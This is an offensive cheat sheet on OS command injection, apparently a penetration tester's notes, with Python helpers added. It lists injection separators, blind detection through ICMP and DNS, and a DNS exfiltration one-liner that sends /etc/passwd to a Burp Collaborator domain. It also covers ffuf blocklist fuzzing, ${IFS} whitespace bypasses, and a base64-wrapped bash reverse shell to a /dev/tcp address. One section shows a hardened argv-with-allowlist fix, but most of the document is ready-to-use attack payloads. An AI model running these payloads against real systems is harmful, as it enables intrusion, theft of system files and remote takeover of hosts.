Cmd Injection

Where Would You Find Command Injection

  • In the following places:

  • Text boxes that take in input

  • Hidden URLs that take input

  • E.g. /execute/command-name

  • Or through query strings, e.g. /location?parameter=command

  • When injecting through a URL, URL encode any characters that aren’t accepted in it (e.g. a space as %20, ; as %3B, | as %7C, & as %26)

  • Hidden ports:

  • Some frameworks open debug ports that take in arbitrary commands

Overview

  • Use command line symbols within the input to alter the executed command

  • Pay close attention to functions within an application that tend to be performed by an OS command

  • Two forms exist: blind command injection, where you do not see the command's output in the response, and non-blind command injection, where the output of the system command is returned to you

  • Ensure you use the proper system commands per the OS:

cat vs type 
ping -c vs ping -n #on Linux -n only means numeric output (no name resolution); without -c the ping never ends and the request hangs
ls vs dir
  • Try to start with reading a world readable file (e.g. /etc/passwd on Linux, C:\Windows\win.ini on Windows)
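The following is an added example, not code from the original page: it shows the string-built command that makes an application injectable, the separators an attacker submits to alter it, and the hardened form (allowlist validation plus argv without a shell). The hostname pattern and the ping command are assumptions chosen for illustration.

```python
"""Command injection: a string-built OS command vs. argv with no shell.
Added example for this page; the ping handler and hostname rule are assumed."""
import re
import shlex
import subprocess


def vulnerable_ping_command(host: str) -> str:
    """The classic bug: untrusted input concatenated into a shell string.
    Anything that runs this via os.system()/shell=True is injectable."""
    return "ping -c 1 " + host


def injection_payloads(benign: str, injected: str) -> dict:
    """For each shell separator, the input an attacker submits so that
    `injected` runs after (or instead of) the intended command."""
    return {
        ";": f"{benign}; {injected}",
        "&&": f"{benign} && {injected}",
        "||": f"nonexistent-host-xyz || {injected}",  # runs when ping fails
        "|": f"{benign} | {injected}",
        "newline": f"{benign}\n{injected}",
        "backtick": f"`{injected}`",
        "subshell": f"$({injected})",
    }


def quoted_ping_command(host: str) -> str:
    """Minimal mitigation when a shell string is unavoidable: shlex.quote
    turns metacharacters into literal text inside single quotes."""
    return "ping -c 1 " + shlex.quote(host)


# RFC 1123-style hostname labels; no shell metacharacters can match this
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def is_valid_hostname(host: str) -> bool:
    return len(host) <= 253 and HOSTNAME_RE.match(host) is not None


def safe_ping_argv(host: str) -> list:
    """Hardened form: allowlist-validate, then pass the value as one argv
    element. With no shell involved, separators are inert."""
    if not is_valid_hostname(host):
        raise ValueError(f"invalid hostname: {host!r}")
    return ["ping", "-c", "1", host]


def run_shell(cmd: str) -> str:
    """Execute `cmd` through /bin/sh the way the vulnerable app would.
    Demonstration only."""
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


if __name__ == "__main__":
    for name, user_input in injection_payloads("127.0.0.1", "id").items():
        print(f"[{name}] {vulnerable_ping_command(user_input)!r}")
    # The ';' form runs `id` even if ping itself is missing or fails
    print(run_shell(vulnerable_ping_command("127.0.0.1; id")))
    for user_input in ("127.0.0.1; id", "$(id)", "example.com"):
        try:
            print("argv:", safe_ping_argv(user_input))
        except ValueError as e:
            print("rejected:", e)
```

Note that `quoted_ping_command` only neutralizes the shell; ping still receives the whole string as a hostname and fails, which is why the allowlist check belongs in front of either form.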

Non-Blind CMD Inj.

  • At the most basic level, once you have identified a potential injection point, use command line symbols (; && || | backticks $( ) and a newline) within the input to alter the executed command

  • If the output of the injected command appears in the response, the injection is non-blind

  • Once you have exploited non-blind cmd injection, escalate to a reverse shell.

Blind CMD Injection

Identification

  • ICMP and DNS are useful to determine blind cmd injection

  • You can also have the target ping a host you control; however, many corporate environments block outbound ICMP at the firewall, so a missing ping doesn't prove that cmd injection isn't taking place

  • On your host, use tcpdump filtered on ICMP to capture the echo requests.

  • This proves blind cmd injection, escalate to reverse shell

Burp Collaborator

  • Launch Burp, and choose:

  • Press Poll Now to see if the request came through

  • If the above worked, move down to Data Exfil section

Data Exfil via DNS and Burp Collaborator

  • Once you have your Burp Collaborator Domain, try your command injection

  • Press Poll now and you should have something returned like this:

  • Then type the following in your local terminal

  • If this fails with Invalid Base32, the padding was dropped because = is not valid in a DNS label: add = signs until the length is a multiple of 8 (up to six may be needed), and upper-case the string if the resolver folded it to lower case
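The encode/decode side of the DNS exfil described above, as an added example that is not part of the original page. Base32 is used because its alphabet (A-Z, 2-7) is legal in DNS labels and survives case folding; the `=` padding is stripped before sending and restored when decoding, which is exactly the "Invalid Base32" situation above. The Collaborator domain, the numbered-label scheme and the GNU coreutils one-liner are assumptions.

```python
"""Exfiltrate command output over DNS via a Collaborator-style domain.
Added example; domain and label scheme are assumed, not from the page."""
import base64

COLLAB_DOMAIN = "example.oastify.com"  # assumption: your Collaborator domain
MAX_LABEL = 63                          # RFC 1035 label length limit


def encode_for_dns(data: bytes, domain: str, label_len: int = MAX_LABEL) -> list:
    """Split base32(data) into labels, one FQDN per chunk, with a sequence
    number so out-of-order or duplicated queries can be reassembled."""
    b32 = base64.b32encode(data).decode().rstrip("=")   # '=' is not a DNS char
    chunks = [b32[i:i + label_len] for i in range(0, len(b32), label_len)]
    return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunks)]


def decode_base32_loose(s: str) -> bytes:
    """Decode base32 whose padding was stripped and whose case may have been
    folded by a resolver. Padding goes to a multiple of 8 characters."""
    s = s.upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def decode_from_dns(observed: list, domain: str) -> bytes:
    """Reassemble the payload from the names seen in Collaborator, in any
    order and any case; unrelated interactions are ignored."""
    suffix = "." + domain.lower()
    chunks = {}
    for name in observed:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        seq, chunk = name[:-len(suffix)].split(".", 1)
        chunks[int(seq)] = chunk            # duplicates (retries) collapse
    return decode_base32_loose("".join(chunks[i] for i in sorted(chunks)))


def injection_payload(cmd: str, domain: str, label_len: int = MAX_LABEL) -> str:
    """The command to inject on a Linux target (GNU coreutils assumed): encode
    the output of `cmd`, strip padding, split into labels and resolve one
    numbered name per chunk."""
    return (f"i=0;for h in $({cmd}|base32 -w0|tr -d =|fold -w{label_len});"
            f"do nslookup $i.$h.{domain};i=$((i+1));done")


if __name__ == "__main__":
    sample = b"root:x:0:0:root:/root:/bin/bash\n"   # constructed stand-in output
    names = encode_for_dns(sample, COLLAB_DOMAIN)
    print("\n".join(names))
    # What Collaborator would show, lower-cased and out of order
    seen = [n.lower() for n in reversed(names)]
    print(decode_from_dns(seen, COLLAB_DOMAIN))
    print(injection_payload("cat /etc/passwd", COLLAB_DOMAIN))
```

The numbered labels cost two or three characters per query but make the reassembly independent of the order Collaborator happens to list interactions in.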

Bypassing Character Blocklist with ffuf

  • If you see that some special characters are banned, create a burp request to the resource you want to test

  • It should be a post request

  • Identify the parameter that it is using to post the data to the server

  • Swap out the command injection attempt that is getting blocked in the burp request with:

  • Save the burp request to your local machine in a file

  • You will usually have to leave the & character out of the wordlist (or send it as %26): the web server parses a raw & as the start of another parameter before the application sees it, so that request tells you nothing about the blocklist

  • Now that you have your results back, filter out the most common response size you see being returned (the "blocked" response):

  • -fs 724

  • You can comma separate filter sizes, i.e. if you see a lot of 724 and 726 returned saying that the character you posted is blocked:

  • -fs 724,726

  • Ensure you also use -mc all (match all status codes) so every HTTP status code is shown; look for 5XX errors, which often mean the character reached the shell and broke the command

  • If you see errors on:
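The wordlist construction and result triage for the ffuf run above, as an added example that is not part of the original page. The ffuf output lines are constructed sample data in ffuf's default format, and the file names are placeholders; the `-request`, `-w`, `-fs` and `-mc` flags are ffuf's own.

```python
"""Build the special-character wordlist for ffuf and triage the results.
Added example; the sample output and file names are constructed."""
import re
from collections import Counter
from urllib.parse import quote, unquote

# Characters worth testing against a command-injection blocklist
SPECIAL_CHARS = list(";|&`$(){}<>\"'\\!#%*?[]~^\n\t ")


def build_wordlist(chars=SPECIAL_CHARS, skip=("&",)) -> list:
    """URL-encoded candidates, one per wordlist line. '&' is skipped because
    a raw & in the body is a parameter separator, not application input."""
    return [quote(c, safe="") for c in chars if c not in skip]


def ffuf_command(req_file: str, wordlist: str, blocked_sizes: list) -> str:
    """Replay the saved Burp request (FUZZ marks the injection point), hide
    the response sizes that mean 'blocked', and show every status code."""
    fs = ",".join(str(s) for s in blocked_sizes)
    return f"ffuf -request {req_file} -w {wordlist} -fs {fs} -mc all"


# Constructed sample of ffuf's output (not from a real run)
SAMPLE_FFUF_OUTPUT = """\
%3B                     [Status: 200, Size: 724, Words: 101, Lines: 23, Duration: 12ms]
%7C                     [Status: 200, Size: 726, Words: 101, Lines: 23, Duration: 11ms]
%60                     [Status: 200, Size: 1203, Words: 140, Lines: 41, Duration: 15ms]
%24                     [Status: 500, Size: 312, Words: 30, Lines: 9, Duration: 9ms]
%28                     [Status: 200, Size: 724, Words: 101, Lines: 23, Duration: 13ms]
%20                     [Status: 200, Size: 726, Words: 101, Lines: 23, Duration: 10ms]
"""

LINE_RE = re.compile(r"^(\S+)\s+\[Status: (\d+), Size: (\d+)")


def parse_ffuf_output(text: str) -> list:
    """-> [(word, status, size), ...] for each result line."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return out


def suggest_filter_sizes(results: list) -> list:
    """Sizes shared by several candidates are the generic 'blocked' page;
    these are the values to pass to -fs."""
    counts = Counter(size for _, _, size in results)
    return sorted(s for s, n in counts.items() if n > 1)


def triage(results: list, blocked_sizes: set) -> list:
    """Candidates whose response differs from the blocked template: a changed
    size means the character got through, a 5xx means it probably reached
    the shell and broke the command. Words are decoded back to the character."""
    return [(unquote(w), status, size) for w, status, size in results
            if size not in blocked_sizes]


if __name__ == "__main__":
    print("\n".join(build_wordlist()))
    results = parse_ffuf_output(SAMPLE_FFUF_OUTPUT)
    sizes = suggest_filter_sizes(results)
    print(ffuf_command("req.txt", "chars.txt", sizes))
    for char, status, size in triage(results, set(sizes)):
        print(f"{char!r}: status={status} size={size}")
```

Write `build_wordlist()` to a file one entry per line and point `-w` at it; ffuf substitutes each line for FUZZ in the saved request without re-encoding it, which is why the encoding is done here.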

IFS Bypass No Spaces CmdInjection

  • Whitespace bypass

  • You can see above that the username (our injection point) cannot contain spaces; use ${IFS} in place of each space to bypass this restriction and get cmd injection (the braces matter, since $IFS followed directly by a word would be read as a differently named variable)

  • To gain a reverse shell, base64 encode the payload and have the target decode and execute it, so only the base64 alphabet and the decode pipeline have to get past the character filter
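Payload shaping for the whitespace bypass and the encoded reverse shell described above, as an added example that is not part of the original page. It generates the `${IFS}` form, a bash brace-expansion alternative for when `$` is blocked, and the base64 wrapper, then checks each result against a blocklist. The reverse shell one-liner and its IP and port are assumptions used only as sample input.

```python
"""Shape a command so it passes a character filter that blocks whitespace.
Added example; the reverse shell, IP and port are placeholders."""
import base64
import re


def ifs_payload(cmd: str) -> str:
    """Replace every run of whitespace with ${IFS}, which the shell expands to
    its field separators. Intended for unquoted words: inside double quotes
    ${IFS} expands to all three separator characters without splitting."""
    return re.sub(r"\s+", "${IFS}", cmd.strip())


def brace_payload(cmd: str) -> str:
    """bash-only alternative when $ or { } in ${IFS} is a problem: {a,b,c}
    expands to 'a b c'. Breaks if an argument itself contains a comma."""
    return "{" + ",".join(cmd.split()) + "}"


def base64_wrapper(cmd: str, shell: str = "sh") -> str:
    """Carry an arbitrary command through the filter: the target only sees
    the base64 alphabet plus the decode pipeline. echo's argument needs no
    quoting because base64 contains no shell metacharacters."""
    b64 = base64.b64encode(cmd.encode()).decode()
    return f"echo${{IFS}}{b64}|base64${{IFS}}-d|{shell}"


def unwrap(payload: str) -> str:
    """Recover the original command from a base64_wrapper() payload (used to
    confirm the wrapper round-trips before sending it)."""
    prefix = "echo${IFS}"
    encoded = payload.split("|", 1)[0][len(prefix):]
    return base64.b64decode(encoded).decode()


def blocked_chars(payload: str, blocklist: set) -> set:
    """Which characters of `payload` would still trip the filter."""
    return {c for c in payload if c in blocklist}


if __name__ == "__main__":
    # Assumed blocklist, as a filter like the one above might enforce
    blocklist = set(" ;&><'\"")
    rev = "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"   # placeholder listener
    for label, p in [("ifs", ifs_payload("cat /etc/passwd")),
                     ("brace", brace_payload("cat /etc/passwd")),
                     ("b64", base64_wrapper(rev))]:
        print(f"{label}: {p}")
        print("   blocked chars:", blocked_chars(p, blocklist) or "none")
    assert unwrap(base64_wrapper(rev)) == rev
```

Base64 output can contain `+`, `/` and `=`; if those are on the blocklist too, swap the transport for a hex `xxd -r -p` pipeline, which only needs `[0-9a-f]` plus the decoder itself.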
